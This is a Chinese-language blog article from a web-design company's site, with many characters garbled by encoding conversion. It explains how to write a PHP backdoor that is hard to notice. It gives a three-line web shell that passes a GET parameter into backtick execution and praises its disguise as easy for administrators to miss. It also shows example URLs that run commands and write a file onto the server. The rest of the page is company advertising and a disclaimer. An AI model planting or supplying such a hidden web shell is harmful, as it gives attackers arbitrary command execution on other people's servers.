如何編寫一個不易被發(fā)現(xiàn)的PHP后門代碼-創(chuàng)新互聯(lián)

本篇內(nèi)容介紹了“如何編寫一個不易被發(fā)現(xiàn)的PHP后門代碼”的有關(guān)知識，在實際案例的操作過程中，不少人都會遇到這樣的困境，接下來就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧！希望大家仔細閱讀，能夠?qū)W有所成！

創(chuàng)新互聯(lián)是一家集網(wǎng)站建設(shè),岳池企業(yè)網(wǎng)站建設(shè),岳池品牌網(wǎng)站建設(shè),網(wǎng)站定制,岳池網(wǎng)站建設(shè)報價,網(wǎng)絡(luò)營銷,網(wǎng)絡(luò)優(yōu)化,岳池網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè)，幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強企業(yè)競爭力?？沙浞譂M足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時我們時刻保持專業(yè)、時尚、前沿，時刻以成就客戶成長自我，堅持不斷學(xué)習(xí)、思考、沉淀、凈化自己，讓我們?yōu)楦嗟钠髽I(yè)打造出實用型網(wǎng)站。

這里用到了一個一般的PHPer都不怎么關(guān)注的反撇號 ` ，反撇號包含的字符串，等同于shell_exec函數(shù)。

偽裝性很好，很容易被管理員忽略。

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

剛看到這段代碼我想大家都會說沒有問題，但是細心的朋友也會發(fā)現(xiàn)下面的變量被一個符號包起來了，既然是變量為什么要這樣了，

而且又不是單引號，這個就是關(guān)鍵所在了，這個符號是 Esc 下面的一個鍵（位于感嘆號！旁邊的），

通過 echo `系統(tǒng)命令`; 可以達到 system(); 一樣的效果

如果不信的朋友可以測試

http://127.0.0.1/t.php?r=dir可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:\web\90sec.php

我用 appserv 和虛擬主機已經(jīng)測試成功。

“如何編寫一個不易被發(fā)現(xiàn)的PHP后門代碼”的內(nèi)容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識可以關(guān)注創(chuàng)新互聯(lián)網(wǎng)站，小編將為大家輸出更多高質(zhì)量的實用文章！

分享標題：如何編寫一個不易被發(fā)現(xiàn)的PHP后門代碼-創(chuàng)新互聯(lián)
瀏覽地址：http://muchs.cn/article24/dcgpce.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站維護、小程序開發(fā)、手機網(wǎng)站建設(shè)、ChatGPT、搜索引擎優(yōu)化、網(wǎng)站制作

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)